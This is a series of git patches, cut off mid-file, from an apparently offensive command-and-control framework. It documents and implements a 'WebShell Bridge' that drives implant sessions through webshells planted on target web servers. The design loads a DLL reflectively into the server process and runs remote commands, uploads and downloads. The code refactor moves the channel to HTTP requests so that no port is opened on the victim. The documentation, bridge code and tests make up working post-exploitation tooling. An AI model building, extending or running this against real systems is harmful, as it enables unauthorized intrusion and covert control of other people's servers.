Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 17:10:58 +0800 Subject: [PATCH 06/19] docs(protocol): add webshell bridge documentation --- docs/protocol/webshell-bridge.md | 156 +++++++++++++++++++++++++++++++ 1 file changed, 156 insertions(+) create mode 100644 docs/protocol/webshell-bridge.md diff --git a/docs/protocol/webshell-bridge.md b/docs/protocol/webshell-bridge.md new file mode 100644 index 00000000..e60a84cb --- /dev/null +++ b/docs/protocol/webshell-bridge.md @@ -0,0 +1,156 @@ +# WebShell Bridge + +## Overview + +WebShell Bridge enables IoM to operate through webshells (JSP/PHP/ASPX) by establishing a communication channel via suo5 HTTP tunnels. The architecture has three clean layers: + +- **Product layer**: Server sees a `CustomPipeline(type="webshell")`. Operators interact via `webshell new/start/stop/delete` commands. No knowledge of rem/suo5/proxyclient required. +- **Implementation layer**: Bridge binary runs on the operator machine, managing transport (rem + proxyclient + suo5), session lifecycle, and task forwarding. +- **Transport layer**: The webshell only handles initial DLL loading and raw HTTP body send/receive. It never parses protocol bytes. + +## Architecture + +``` +Product Layer (operator sees) +───────────────────────────── + Client/TUI + webshell new --listener my-listener + use + exec whoami + + Server + CustomPipeline(type="webshell") + Session appears like any other implant session + + +Bridge Binary (server/cmd/webshell-bridge/) +───────────────────────────────────────── + Runs on operator machine, connects to Server via ListenerRPC (mTLS) + + ┌─ transport adapter ──────────────────────────────────────┐ + │ rem (internal, not exposed as product concept) │ + │ proxyclient/suo5 (HTTP full-duplex tunnel) │ + └──────────────────────────────────────────────────────────┘ + + ┌─ spite/session adapter ──────────────────────────────────┐ + │ SpiteStream ↔ rem channel protocol translation │ + │ Session registration, checkin, task routing │ + └──────────────────────────────────────────────────────────┘ + + +Target Web Server Process +───────────────────────── + WebShell (JSP/PHP/ASPX) + - Initial bridge DLL loading (reflective/memory) + - HTTP body send/receive + - Pass raw bytes to bridge, no parsing + + Bridge Runtime DLL (in web server process memory) + ┌─ transport adapter ─────────────────────────────────┐ + │ rem server on 127.0.0.1: │ + │ Bridge binary connects as rem client via suo5 │ + └─────────────────────────────────────────────────────┘ + + ┌─ spite/session adapter ─────────────────────────────┐ + │ Receives Spite over rem channel │ + │ Routes to module runtime by spite.Name │ + └─────────────────────────────────────────────────────┘ + + ┌─ malefic module runtime ────────────────────────────┐ + │ exec / bof / execute_pe / upload / download / ... │ + │ All malefic modules available │ + └─────────────────────────────────────────────────────┘ +``` + +## Data Flow + +``` +Client exec("whoami") + → Server (SpiteStream) + → Bridge binary (session adapter) + → [rem channel through suo5 HTTP tunnel] + → Bridge Runtime DLL (module runtime) + → exec("whoami") → "root" + → Spite response over rem channel + → [suo5 HTTP tunnel] + → Bridge binary → SpiteStream.Send(response) + → Server → Client displays "root" +``` + +## Usage + +### 1. Run bridge binary + +```bash +webshell-bridge \ + --auth listener.auth \ + --suo5 suo5://target.com/suo5.jsp \ + --listener my-listener \ + --pipeline webshell_my-listener \ + --dll-addr 127.0.0.1:13338 +``` + +The `--dll-addr` flag tells the bridge binary which address to connect to through the suo5 tunnel (default: `127.0.0.1:13338`). This must match the DLL's compiled `DEFAULT_ADDR` in `malefic-bridge-dll/src/lib.rs` and the webshell's status probe port (`BRIDGE_DLL_PORT` in PHP, port constant in ASPX/JSP). Changing the port requires updating all three locations and recompiling the DLL. + +At startup the bridge registers the listener, opens `JobStream`, and waits for pipeline start/stop/sync control. It does **not** auto-register or auto-start the `CustomPipeline`. + +### 2. Register and start the pipeline from Client/TUI + +``` +webshell new --listener my-listener +``` + +This creates `CustomPipeline(type="webshell")` and sends the pipeline start control to the already running bridge. + +### 3. Deploy suo5 webshell + bridge DLL on target + +Deploy the suo5 webshell (JSP/PHP/ASPX) to the target web server. The webshell loads the bridge DLL into the web server process memory. The bridge DLL starts a rem server on `127.0.0.1:13338` (or the port matching `--dll-addr`). + +If the DLL is not loaded when the pipeline starts, the bridge keeps retrying `connectDLL` with exponential backoff until the rem server becomes reachable or the retry budget is exhausted. + +### 4. Interact + +``` +use +exec whoami +upload /local/file /remote/path +download /remote/file +``` + +## Rem Channel Protocol + +The bridge binary communicates with the bridge DLL using the rem wire protocol over a TCP connection tunneled through suo5. + +### Wire Format + +Each message: `[1 byte msg_type][4 bytes LE length][protobuf payload]` + +Uses `cio.WriteMsg`/`cio.ReadMsg` from `github.com/chainreactors/rem/protocol/cio`. + +### Session Lifecycle + +``` +1. Bridge dials DLL: transport.Dial("tcp", dllAddr) [through suo5] +2. Login handshake: Login{Agent: id, Mod: "bridge"} → Ack{Status: 1} +3. DLL sends: Packet{ID: 0, Data: Marshal(Register{SysInfo, Modules})} +4. Bridge registers session with server using real SysInfo/Modules +5. Task exchange: Packet{ID: taskID, Data: Marshal(Spite)} ↔ bidirectional +``` + +### DLL Requirements + +The bridge DLL (malefic create branch) must: +1. Start a rem-compatible TCP listener on the configured port +2. Accept Login, respond with Ack +3. Send a handshake Packet{ID: 0} containing serialized `implantpb.Register` +4. For each received Packet, unmarshal the Spite, execute the module, and reply with a Packet containing the response Spite + +## Key Files + +| Purpose | Path | +|---------|------| +| Bridge binary | `server/cmd/webshell-bridge/` | +| Rem channel | `server/cmd/webshell-bridge/channel.go` | +| Client commands | `client/command/pipeline/webshell.go` | +| CustomPipeline (server) | `server/listener/custom.go` | +| proxyclient/suo5 | `github.com/chainreactors/proxyclient/suo5` | From 49712dab37ac3b8c959859289f01288eca49ae1a Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 18:26:05 +0800 Subject: [PATCH 07/19] refactor(webshell-bridge): replace TCP transport with HTTP memory channel MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Remove suo5 TCP tunnel (transport.go) and rewrite Channel to communicate with the bridge DLL through HTTP POST requests with X-Stage headers. The webshell now calls DLL exports directly via function pointers — no TCP port opened on the target. Introduce ChannelIface for testability. --- server/cmd/webshell-bridge/bridge.go | 145 +---- server/cmd/webshell-bridge/bridge_test.go | 396 +++---------- server/cmd/webshell-bridge/channel.go | 391 +++++++------ server/cmd/webshell-bridge/channel_test.go | 578 +++++-------------- server/cmd/webshell-bridge/config.go | 17 +- server/cmd/webshell-bridge/main.go | 10 +- server/cmd/webshell-bridge/session.go | 12 +- server/cmd/webshell-bridge/transport.go | 131 ----- server/cmd/webshell-bridge/transport_test.go | 58 -- 9 files changed, 503 insertions(+), 1235 deletions(-) delete mode 100644 server/cmd/webshell-bridge/transport.go delete mode 100644 server/cmd/webshell-bridge/transport_test.go diff --git a/server/cmd/webshell-bridge/bridge.go b/server/cmd/webshell-bridge/bridge.go index 2f1d374a..61673b0a 100644 --- a/server/cmd/webshell-bridge/bridge.go +++ b/server/cmd/webshell-bridge/bridge.go @@ -9,8 +9,6 @@ import ( "sync" "time" - "strings" - "github.com/chainreactors/IoM-go/consts" mtls "github.com/chainreactors/IoM-go/mtls" "github.com/chainreactors/IoM-go/proto/client/clientpb" @@ -19,7 +17,6 @@ import ( iomtypes "github.com/chainreactors/IoM-go/types" "github.com/chainreactors/logs" "github.com/chainreactors/malice-network/helper/cryptography" - "github.com/chainreactors/malice-network/helper/implanttypes" "google.golang.org/grpc" "google.golang.org/grpc/codes" "google.golang.org/grpc/metadata" @@ -40,8 +37,7 @@ const ( // The bridge owns the listener runtime only. Custom pipelines are created and // controlled through pipeline start/stop events from the server. type Bridge struct { - cfg *Config - transport dialTransport + cfg *Config conn *grpc.ClientConn rpc listenerrpc.ListenerRPCClient @@ -52,29 +48,19 @@ type Bridge struct { } type pipelineRuntime struct { - name string - ctx context.Context - cancel context.CancelFunc - spiteStream listenerrpc.ListenerRPC_SpiteStreamClient - sendMu sync.Mutex - sessions sync.Map // sessionID -> *Session - sessionsByRawID sync.Map // rawSID (uint32) -> *Session (for CtrlListenerSyncSession lookup) - streamTasks sync.Map // "sessionID:taskID" -> context.CancelFunc (pump goroutine) - secureConfig *implanttypes.SecureConfig - done chan struct{} + name string + ctx context.Context + cancel context.CancelFunc + spiteStream listenerrpc.ListenerRPC_SpiteStreamClient + sendMu sync.Mutex + sessions sync.Map // sessionID -> *Session + streamTasks sync.Map // "sessionID:taskID" -> context.CancelFunc (pump goroutine) + done chan struct{} } // NewBridge creates a new bridge instance. func NewBridge(cfg *Config) (*Bridge, error) { - transport, err := NewTransport(cfg.Suo5URL) - if err != nil { - return nil, fmt.Errorf("init transport: %w", err) - } - - return &Bridge{ - cfg: cfg, - transport: transport, - }, nil + return &Bridge{cfg: cfg}, nil } // Start runs the bridge lifecycle: @@ -118,14 +104,15 @@ func (b *Bridge) Start(parent context.Context) error { return b.runJobLoop(ctx) } -// connectDLL establishes a malefic channel to the bind DLL on the target -// through the suo5 tunnel. Retries with exponential backoff up to -// retryMaxAttempts before giving up. +// connectDLL establishes a channel to the DLL on the target. +// Sends HTTP requests to the webshell which calls DLL exports directly +// via function pointers (memory channel). No TCP port opened on target. +// Retries with exponential backoff up to retryMaxAttempts before giving up. func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error { sessionID := cryptography.RandomString(8) - channel := NewChannel(b.transport, b.cfg.DLLAddr, runtime.name) - logs.Log.Importantf("waiting for DLL at %s ...", b.cfg.DLLAddr) + channel := NewChannel(b.cfg.WebshellHTTPURL(), b.cfg.StageToken) + logs.Log.Importantf("waiting for DLL at %s ...", b.cfg.WebshellHTTPURL()) delay := retryBaseDelay for attempt := 1; attempt <= retryMaxAttempts; attempt++ { @@ -154,16 +141,8 @@ func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error } break } - logs.Log.Important("DLL connected via malefic channel") - // Inject Age keys before Handshake so the parser can decrypt/encrypt. - if runtime.secureConfig != nil && runtime.secureConfig.Enable { - keyPair := buildInitialKeyPair(runtime.secureConfig) - if keyPair != nil { - channel.WithSecure(keyPair) - logs.Log.Debugf("Age secure mode active for DLL channel") - } - } + logs.Log.Important("DLL connected via memory channel") sess, err := NewSession( b.rpc, b.pipelineCtx(ctx, runtime.name), @@ -177,29 +156,9 @@ func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error channel.StartRecvLoop() runtime.sessions.Store(sess.ID, sess) - runtime.sessionsByRawID.Store(channel.sessionID, sess) return nil } -// buildInitialKeyPair assembles a KeyPair from the pipeline's SecureConfig. -// PrivateKey = server private key (to decrypt DLL messages). -// PublicKey = implant public key (to encrypt messages to DLL). -// This mirrors core.GetKeyPairForSession without per-session lookup. -func buildInitialKeyPair(sc *implanttypes.SecureConfig) *clientpb.KeyPair { - if sc == nil || !sc.Enable { - return nil - } - pub := strings.TrimSpace(sc.ImplantPublicKey) - priv := strings.TrimSpace(sc.ServerPrivateKey) - if pub == "" && priv == "" { - return nil - } - return &clientpb.KeyPair{ - PublicKey: pub, - PrivateKey: priv, - } -} - // connect establishes the mTLS gRPC connection to the server. func (b *Bridge) connect(ctx context.Context) error { authCfg, err := mtls.ReadConfig(b.cfg.AuthFile) @@ -256,13 +215,6 @@ func (b *Bridge) runJobLoop(ctx context.Context) error { return fmt.Errorf("job stream recv: %w", err) } - // Handle session key sync without sending a status response, - // matching the real listener behavior (server/listener/listener.go:360). - if msg.GetCtrl() == consts.CtrlListenerSyncSession { - b.handleSyncSession(msg.GetSession()) - continue - } - statusMsg := b.handleJobCtrl(ctx, msg) if err := b.jobStream.Send(statusMsg); err != nil { if ctx.Err() != nil { @@ -315,18 +267,12 @@ func (b *Bridge) handlePipelineStart(ctx context.Context, job *clientpb.Job) err return err } - secCfg := implanttypes.FromSecure(pipe.GetSecure()) - if secCfg.Enable { - logs.Log.Importantf("pipeline %s: Age secure mode enabled", pipe.GetName()) - } - runtimeCtx, cancel := context.WithCancel(ctx) runtime := &pipelineRuntime{ - name: pipe.GetName(), - ctx: runtimeCtx, - cancel: cancel, - secureConfig: secCfg, - done: make(chan struct{}), + name: pipe.GetName(), + ctx: runtimeCtx, + cancel: cancel, + done: make(chan struct{}), } b.activeMu.Lock() @@ -351,7 +297,7 @@ func (b *Bridge) handlePipelineStart(ctx context.Context, job *clientpb.Job) err runtime.spiteStream = spiteStream go b.runRuntime(runtime) - logs.Log.Importantf("pipeline %s starting; waiting for DLL at %s", runtime.name, b.cfg.DLLAddr) + logs.Log.Importantf("pipeline %s starting; waiting for DLL at %s", runtime.name, b.cfg.WebshellHTTPURL()) return nil } @@ -379,53 +325,6 @@ func (b *Bridge) handlePipelineSync(job *clientpb.Job) error { return nil } -// handleSyncSession processes CtrlListenerSyncSession from the server. -// The server pushes per-session Age key pairs after a session registers with -// secure mode enabled. We update the channel's parser so subsequent -// reads/writes use the session-specific keys. -func (b *Bridge) handleSyncSession(sess *clientpb.Session) { - if sess == nil { - return - } - - b.activeMu.Lock() - runtime := b.active - b.activeMu.Unlock() - if runtime == nil { - return - } - - rawID := sess.GetRawId() - val, ok := runtime.sessionsByRawID.Load(rawID) - if !ok { - logs.Log.Debugf("sync session: no session for raw ID %d", rawID) - return - } - - session := val.(*Session) - kp := sess.GetKeyPair() - if kp == nil || (kp.GetPublicKey() == "" && kp.GetPrivateKey() == "") { - logs.Log.Debugf("sync session %s: no key pair, skipping", session.ID) - return - } - - // Merge: session-specific private key takes priority, fall back to pipeline's. - merged := &clientpb.KeyPair{ - PublicKey: kp.GetPublicKey(), - PrivateKey: kp.GetPrivateKey(), - } - if runtime.secureConfig != nil { - pipelinePriv := strings.TrimSpace(runtime.secureConfig.ServerPrivateKey) - sessionPriv := strings.TrimSpace(kp.GetPrivateKey()) - if pipelinePriv != "" && sessionPriv != pipelinePriv { - merged.PrivateKey = sessionPriv + "\n" + pipelinePriv - } - } - - session.channel.WithSecure(merged) - logs.Log.Debugf("sync session %s: Age keys updated (rawID=%d)", session.ID, rawID) -} - func (b *Bridge) jobPipelineName(job *clientpb.Job) (string, error) { if job == nil { return "", fmt.Errorf("missing job") diff --git a/server/cmd/webshell-bridge/bridge_test.go b/server/cmd/webshell-bridge/bridge_test.go index bf5e3b4a..5ac64c06 100644 --- a/server/cmd/webshell-bridge/bridge_test.go +++ b/server/cmd/webshell-bridge/bridge_test.go @@ -5,7 +5,6 @@ import ( "errors" "fmt" "io" - "net" "sync" "testing" "time" @@ -13,47 +12,11 @@ import ( "github.com/chainreactors/IoM-go/proto/client/clientpb" "github.com/chainreactors/IoM-go/proto/implant/implantpb" "github.com/chainreactors/IoM-go/proto/services/listenerrpc" - "github.com/chainreactors/malice-network/helper/implanttypes" - malefic "github.com/chainreactors/malice-network/server/internal/parser/malefic" "google.golang.org/grpc" "google.golang.org/grpc/metadata" "google.golang.org/protobuf/proto" ) -type blockingDialTransport struct { - started chan struct{} -} - -func (t *blockingDialTransport) DialContext(ctx context.Context, network, address string) (net.Conn, error) { - select { - case <-t.started: - default: - close(t.started) - } - <-ctx.Done() - return nil, ctx.Err() -} - -// badHandshakeTransport returns a connection that sends an invalid malefic frame. -type badHandshakeTransport struct{} - -func (t *badHandshakeTransport) DialContext(ctx context.Context, network, address string) (net.Conn, error) { - clientConn, serverConn := net.Pipe() - go func() { - defer serverConn.Close() - // Send a malefic frame with corrupt payload (invalid protobuf) - frame := []byte{ - malefic.DefaultStartDelimiter, - 0x01, 0x00, 0x00, 0x00, // sessionID = 1 - 0x03, 0x00, 0x00, 0x00, // length = 3 - 0xBA, 0xAD, 0x00, // corrupt payload - malefic.DefaultEndDelimiter, - } - serverConn.Write(frame) - }() - return clientConn, nil -} - type fakeBridgeRPC struct { listenerrpc.ListenerRPCClient @@ -100,112 +63,18 @@ func newFakeSpiteStream() *fakeSpiteStream { func (f *fakeSpiteStream) Header() (metadata.MD, error) { return nil, nil } func (f *fakeSpiteStream) Trailer() metadata.MD { return nil } func (f *fakeSpiteStream) CloseSend() error { - f.closeOnce.Do(func() { - close(f.closed) - }) + f.closeOnce.Do(func() { close(f.closed) }) return nil } -func (f *fakeSpiteStream) Context() context.Context { return context.Background() } -func (f *fakeSpiteStream) SendMsg(m interface{}) error { - return nil -} -func (f *fakeSpiteStream) RecvMsg(m interface{}) error { - <-f.closed - return io.EOF -} +func (f *fakeSpiteStream) Context() context.Context { return context.Background() } +func (f *fakeSpiteStream) SendMsg(m interface{}) error { return nil } +func (f *fakeSpiteStream) RecvMsg(m interface{}) error { <-f.closed; return io.EOF } func (f *fakeSpiteStream) Send(*clientpb.SpiteResponse) error { return nil } func (f *fakeSpiteStream) Recv() (*clientpb.SpiteRequest, error) { <-f.closed return nil, io.EOF } -func TestHandlePipelineStartReturnsBeforeDLLConnectCompletes(t *testing.T) { - transport := &blockingDialTransport{started: make(chan struct{})} - bridge := &Bridge{ - cfg: &Config{ - ListenerName: "listener-a", - DLLAddr: "127.0.0.1:13338", - }, - transport: transport, - rpc: &fakeBridgeRPC{ - spiteStream: newFakeSpiteStream(), - }, - } - - job := &clientpb.Job{ - Name: "ws-a", - Pipeline: &clientpb.Pipeline{ - Name: "ws-a", - Type: pipelineType, - }, - } - - errCh := make(chan error, 1) - go func() { - errCh <- bridge.handlePipelineStart(context.Background(), job) - }() - - select { - case err := <-errCh: - if err != nil { - t.Fatalf("handlePipelineStart returned error: %v", err) - } - case <-time.After(300 * time.Millisecond): - t.Fatal("handlePipelineStart blocked on DLL connect") - } - - select { - case <-transport.started: - case <-time.After(time.Second): - t.Fatal("background DLL connect was not started") - } - - if err := bridge.stopActiveRuntime("ws-a"); err != nil { - t.Fatalf("stopActiveRuntime failed: %v", err) - } -} - -func TestRunRuntimeSyncsPipelineStopAfterUnexpectedConnectFailure(t *testing.T) { - rpc := &fakeBridgeRPC{spiteStream: newFakeSpiteStream()} - bridge := &Bridge{ - cfg: &Config{ - ListenerName: "listener-b", - DLLAddr: "127.0.0.1:13338", - }, - transport: &badHandshakeTransport{}, - rpc: rpc, - } - - job := &clientpb.Job{ - Name: "ws-b", - Pipeline: &clientpb.Pipeline{ - Name: "ws-b", - Type: pipelineType, - }, - } - - if err := bridge.handlePipelineStart(context.Background(), job); err != nil { - t.Fatalf("handlePipelineStart failed: %v", err) - } - - deadline := time.Now().Add(time.Second) - for time.Now().Before(deadline) { - calls := rpc.StopCalls() - if len(calls) == 1 { - if calls[0].GetName() != "ws-b" { - t.Fatalf("stop name = %q, want %q", calls[0].GetName(), "ws-b") - } - if calls[0].GetListenerId() != "listener-b" { - t.Fatalf("stop listener_id = %q, want %q", calls[0].GetListenerId(), "listener-b") - } - return - } - time.Sleep(10 * time.Millisecond) - } - - t.Fatal("expected background stop sync after connect failure") -} - // collectingSpiteStream records all sent SpiteResponses for test assertions. type collectingSpiteStream struct { grpc.ClientStream @@ -217,9 +86,7 @@ type collectingSpiteStream struct { } func newCollectingSpiteStream() *collectingSpiteStream { - return &collectingSpiteStream{ - closed: make(chan struct{}), - } + return &collectingSpiteStream{closed: make(chan struct{})} } func (s *collectingSpiteStream) Header() (metadata.MD, error) { return nil, nil } @@ -228,14 +95,9 @@ func (s *collectingSpiteStream) CloseSend() error { s.recvOnce.Do(func() { close(s.closed) }) return nil } -func (s *collectingSpiteStream) Context() context.Context { return context.Background() } -func (s *collectingSpiteStream) SendMsg(m interface{}) error { - return nil -} -func (s *collectingSpiteStream) RecvMsg(m interface{}) error { - <-s.closed - return io.EOF -} +func (s *collectingSpiteStream) Context() context.Context { return context.Background() } +func (s *collectingSpiteStream) SendMsg(m interface{}) error { return nil } +func (s *collectingSpiteStream) RecvMsg(m interface{}) error { <-s.closed; return io.EOF } func (s *collectingSpiteStream) Send(resp *clientpb.SpiteResponse) error { s.mu.Lock() s.sent = append(s.sent, proto.Clone(resp).(*clientpb.SpiteResponse)) @@ -254,56 +116,15 @@ func (s *collectingSpiteStream) Sent() []*clientpb.SpiteResponse { return out } -func TestForwardToSessionStreaming(t *testing.T) { - // Set up a mock DLL that sends 3 streaming responses for one task - mock := newMockMaleficDLL(t) - defer mock.close() - - const taskID uint32 = 500 - const numResponses = 3 - - go func() { - conn, err := mock.ln.Accept() - if err != nil { - return - } - defer conn.Close() - - // Send handshake - regSpite := &implantpb.Spites{ - Spites: []*implantpb.Spite{ - {Body: &implantpb.Spite_Register{Register: mock.register}}, - }, - } - testWriteMaleficFrame(conn, regSpite, mock.sessionID) - - // Read the initial streaming request - testReadMaleficFrame(conn) - - // Send multiple responses for the same task - for i := 0; i < numResponses; i++ { - resp := &implantpb.Spites{ - Spites: []*implantpb.Spite{ - { - Name: fmt.Sprintf("stream-resp-%d", i), - TaskId: taskID, - }, - }, - } - testWriteMaleficFrame(conn, resp, mock.sessionID) - } - }() +func TestForwardToSessionUnary(t *testing.T) { + srv, _ := startMockWebshell(t) - // Build a real channel + session - ch := dialMockDLL(t, mock.addr()) + ch := NewChannel(srv.URL, "") defer ch.Close() - reg, err := ch.Handshake() - if err != nil { + if _, err := ch.Handshake(); err != nil { t.Fatalf("handshake: %v", err) } - _ = reg - ch.StartRecvLoop() session := &Session{ @@ -326,52 +147,70 @@ func TestForwardToSessionStreaming(t *testing.T) { } runtime.sessions.Store(session.ID, session) - bridge := &Bridge{ - cfg: &Config{ListenerName: "test-listener"}, - } + bridge := &Bridge{cfg: &Config{ListenerName: "test-listener"}} - // Forward with streaming task (Total = -1) req := &clientpb.SpiteRequest{ Session: &clientpb.Session{SessionId: session.ID}, - Task: &clientpb.Task{TaskId: taskID, Total: -1}, - Spite: &implantpb.Spite{Name: "start-pty"}, + Task: &clientpb.Task{TaskId: 1, Total: 1}, + Spite: &implantpb.Spite{Name: "exec"}, } - bridge.forwardToSession(runtime, session.ID, taskID, req) - - // Wait for all streaming responses to be forwarded - deadline := time.Now().Add(3 * time.Second) - for time.Now().Before(deadline) { - sent := stream.Sent() - if len(sent) >= numResponses { - break - } - time.Sleep(50 * time.Millisecond) - } + bridge.forwardToSession(runtime, session.ID, 1, req) sent := stream.Sent() - if len(sent) != numResponses { - t.Fatalf("expected %d responses, got %d", numResponses, len(sent)) + if len(sent) != 1 { + t.Fatalf("expected 1 response, got %d", len(sent)) } - for i, resp := range sent { - expected := fmt.Sprintf("stream-resp-%d", i) - if resp.GetSpite().GetName() != expected { - t.Errorf("response %d: expected %q, got %q", i, expected, resp.GetSpite().GetName()) - } - if resp.GetTaskId() != taskID { - t.Errorf("response %d: expected taskID %d, got %d", i, taskID, resp.GetTaskId()) - } + if sent[0].GetSpite().GetName() != "resp:exec" { + t.Errorf("expected 'resp:exec', got %q", sent[0].GetSpite().GetName()) } - } -func TestForwardToSessionUnary(t *testing.T) { - mock := newMockMaleficDLL(t) - defer mock.close() +func TestForwardToSessionStreaming(t *testing.T) { + srv, mock := startMockWebshell(t) - go mock.serve(t, 1) // Handshake + 1 Spite roundtrip + var callCount int + var mu sync.Mutex + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + if stage == "status" { + return []byte("LOADED"), 200 + } + if stage == "init" { + regData, _ := proto.Marshal(mock.register) + sid := make([]byte, 4) + sid[0] = byte(mock.sessionID) + return append(sid, regData...), 200 + } + if stage == "spite" { + // Parse input + inSpites := &implantpb.Spites{} + if len(body) > 0 { + proto.Unmarshal(body, inSpites) + } - ch := dialMockDLL(t, mock.addr()) + mu.Lock() + callCount++ + n := callCount + mu.Unlock() + + // First few calls: return streaming responses for task 500 + if n <= 3 { + resp := &implantpb.Spites{ + Spites: []*implantpb.Spite{{ + Name: fmt.Sprintf("stream-resp-%d", n-1), + TaskId: 500, + }}, + } + data, _ := proto.Marshal(resp) + return data, 200 + } + empty, _ := proto.Marshal(&implantpb.Spites{}) + return empty, 200 + } + return nil, 404 + }) + + ch := NewChannel(srv.URL, "") defer ch.Close() if _, err := ch.Handshake(); err != nil { @@ -399,109 +238,30 @@ func TestForwardToSessionUnary(t *testing.T) { } runtime.sessions.Store(session.ID, session) - bridge := &Bridge{ - cfg: &Config{ListenerName: "test-listener"}, - } + bridge := &Bridge{cfg: &Config{ListenerName: "test-listener"}} - // Forward with unary task (Total = 1, not streaming) req := &clientpb.SpiteRequest{ Session: &clientpb.Session{SessionId: session.ID}, - Task: &clientpb.Task{TaskId: 1, Total: 1}, - Spite: &implantpb.Spite{Name: "exec"}, - } - - bridge.forwardToSession(runtime, session.ID, 1, req) - - sent := stream.Sent() - if len(sent) != 1 { - t.Fatalf("expected 1 response, got %d", len(sent)) - } - if sent[0].GetSpite().GetName() != "resp:exec" { - t.Errorf("expected 'resp:exec', got %q", sent[0].GetSpite().GetName()) - } -} - -func TestHandleSyncSession(t *testing.T) { - mock := newMockMaleficDLL(t) - defer mock.close() - - go mock.serve(t, 0) // Handshake only - - ch := dialMockDLL(t, mock.addr()) - defer ch.Close() - - if _, err := ch.Handshake(); err != nil { - t.Fatalf("handshake: %v", err) - } - - session := &Session{ - ID: "test-session", - PipelineID: "test-pipeline", - ListenerID: "test-listener", - channel: ch, - } - - runtime := &pipelineRuntime{ - name: "test-pipeline", - secureConfig: &implanttypes.SecureConfig{ - Enable: true, - ServerPrivateKey: "AGE-SECRET-KEY-PIPELINE", - ImplantPublicKey: "age1pipeline", - }, - done: make(chan struct{}), - } - runtime.sessions.Store(session.ID, session) - runtime.sessionsByRawID.Store(ch.sessionID, session) - - bridge := &Bridge{ - cfg: &Config{ListenerName: "test-listener"}, + Task: &clientpb.Task{TaskId: 500, Total: -1}, + Spite: &implantpb.Spite{Name: "start-pty"}, } - bridge.activeMu.Lock() - bridge.active = runtime - bridge.activeMu.Unlock() - - // Simulate CtrlListenerSyncSession from server - bridge.handleSyncSession(&clientpb.Session{ - RawId: ch.sessionID, - KeyPair: &clientpb.KeyPair{ - PublicKey: "age1session-specific", - PrivateKey: "AGE-SECRET-KEY-SESSION", - }, - }) - // Verify the channel's parser got updated with merged keys - if ch.parser == nil { - t.Fatal("parser should not be nil") - } - // The parser should now have keyPair set (we can verify via WithSecure's effect) - // Since MaleficParser.keyPair is unexported, we verify indirectly: - // the fact that handleSyncSession didn't panic and the channel is still alive - if !session.Alive() { - t.Error("session should still be alive after key sync") - } -} + bridge.forwardToSession(runtime, session.ID, 500, req) -func TestHandleSyncSessionUnknownRawID(t *testing.T) { - runtime := &pipelineRuntime{ - name: "test-pipeline", - done: make(chan struct{}), + // Wait for streaming responses + deadline := time.Now().Add(5 * time.Second) + for time.Now().Before(deadline) { + sent := stream.Sent() + if len(sent) >= 2 { + break + } + time.Sleep(100 * time.Millisecond) } - bridge := &Bridge{ - cfg: &Config{ListenerName: "test-listener"}, + sent := stream.Sent() + if len(sent) < 2 { + t.Fatalf("expected at least 2 streaming responses, got %d", len(sent)) } - bridge.activeMu.Lock() - bridge.active = runtime - bridge.activeMu.Unlock() - - // Should not panic with unknown raw ID - bridge.handleSyncSession(&clientpb.Session{ - RawId: 99999, - KeyPair: &clientpb.KeyPair{ - PublicKey: "age1unknown", - PrivateKey: "AGE-SECRET-KEY-UNKNOWN", - }, - }) } var _ listenerrpc.ListenerRPC_SpiteStreamClient = (*fakeSpiteStream)(nil) diff --git a/server/cmd/webshell-bridge/channel.go b/server/cmd/webshell-bridge/channel.go index 7a74bd34..8746a2a0 100644 --- a/server/cmd/webshell-bridge/channel.go +++ b/server/cmd/webshell-bridge/channel.go @@ -1,187 +1,215 @@ package main import ( + "bytes" "context" + "crypto/tls" "fmt" "io" - "net" + "net/http" "sync" + "sync/atomic" "time" "github.com/chainreactors/IoM-go/proto/client/clientpb" "github.com/chainreactors/IoM-go/proto/implant/implantpb" "github.com/chainreactors/logs" - malefic "github.com/chainreactors/malice-network/server/internal/parser/malefic" + "google.golang.org/protobuf/proto" ) const ( - handshakeBridgeID uint32 = 0 - connectTimeout = 10 * time.Second - streamChanBuffer = 16 + httpTimeout = 30 * time.Second + pollInterval = 500 * time.Millisecond + streamChanBuffer = 16 + stageInit = "init" + stageSpite = "spite" + stageStatus = "status" + headerStage = "X-Stage" + headerToken = "X-Token" + headerSessionID = "X-Session-ID" ) -// Channel manages the malefic protocol connection to the bind DLL on the target. -// The bridge binary acts as a client, the DLL acts as a malefic bind server. -// Communication tunnels through suo5: transport.Dial -> suo5 HTTP -> target localhost. +// ChannelIface abstracts the communication channel to the bridge DLL. +type ChannelIface interface { + Connect(ctx context.Context) error + Handshake() (*implantpb.Register, error) + StartRecvLoop() + Forward(taskID uint32, spite *implantpb.Spite) (*implantpb.Spite, error) + OpenStream(taskID uint32) <-chan *implantpb.Spite + SendSpite(taskID uint32, spite *implantpb.Spite) error + CloseStream(taskID uint32) + CloseAllStreams() + WithSecure(keyPair *clientpb.KeyPair) + Close() error + SessionID() uint32 + IsClosed() bool +} + +// Channel communicates with the bridge DLL through HTTP POST requests +// to the webshell's X-Stage endpoints. The webshell calls DLL exports +// (bridge_init, bridge_process) directly via function pointers — no TCP +// port opened on the target, pure memory channel. +// +// Wire format: raw protobuf over HTTP body. // -// Streaming task support: OpenStream registers a per-taskID response channel -// that persists across multiple DLL responses. recvLoop dispatches incoming -// packets to the correct channel without removing it, enabling PTY, bridge-agent, -// and other streaming modules. CloseStream or CloseAllStreams handles cleanup. +// For streaming tasks, a background poll goroutine periodically sends +// empty requests to collect pending responses from the DLL. type Channel struct { - conn net.Conn - transport dialTransport - dllAddr string - - sessionID uint32 // malefic session ID from DLL's first frame - parser *malefic.MaleficParser - - writeMu sync.Mutex // serializes writes to conn - pending map[uint32]chan *implantpb.Spite // taskID -> response channel - pendMu sync.Mutex // guards pending map - closed bool - closeMu sync.Mutex - recvDone chan struct{} // closed when recvLoop exits - recvErr error // terminal error from recvLoop -} + webshellURL string + token string + client *http.Client + + sid uint32 + sidSet atomic.Bool + closed atomic.Bool + closeCh chan struct{} -type dialTransport interface { - DialContext(ctx context.Context, network, address string) (net.Conn, error) + pendMu sync.Mutex + pending map[uint32]chan *implantpb.Spite + + pollCancel context.CancelFunc } -// 